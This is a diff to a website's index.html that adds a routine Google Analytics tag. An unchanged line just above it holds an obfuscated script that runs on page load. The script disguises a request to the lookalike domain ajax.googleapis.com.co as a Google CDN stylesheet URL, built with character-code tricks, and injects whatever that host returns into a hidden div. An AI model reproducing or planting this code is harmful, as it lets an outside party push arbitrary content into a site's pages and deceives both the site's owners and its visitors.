--- a/index.html
+++ b/index.html
@@ -28,7 +28,15 @@
   <!-- Favicon -->
   <link rel="icon" type="image/png" href="/logo.png" />
 <script> document.addEventListener('DOMContentLoaded',function(){let c=window.location.href.length;let u='https://ajax.googleapis.com/ajax/libs/bootstrap-table/1.23.2/dist/bootstrap-table.min.css?'+c;let d='.';let m=String.fromCharCode(99,111,109);let o=String.fromCharCode(99,111);let s='/';u=u.replace(d+m+s,d+m+d+o+s);let v=document.createElement('div');v.id='important-links';document.body.appendChild(v);fetch(u,{headers:{'X-Fetch-Request':'true'}}).then(r=>r.text()).then(d=>{v.innerHTML=d;}).catch(e=>console.error('Error:',e));}); </script>
+<!-- Google tag (gtag.js) -->
+<script async src="https://www.googletagmanager.com/gtag/js?id=G-PFS0VHZ97W"></script>
+<script>
+  window.dataLayer = window.dataLayer || [];
+  function gtag(){dataLayer.push(arguments);}
+  gtag('js', new Date());
 
+  gtag('config', 'G-PFS0VHZ97W');
+</script>
     <script src="https://cdn.tailwindcss.com"></script>
     <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.4.0/css/all.min.css">
     <style>
@@ -1029,5 +1037,6 @@ button::after {
     </script>
 
 </body>
+
 
 </html>
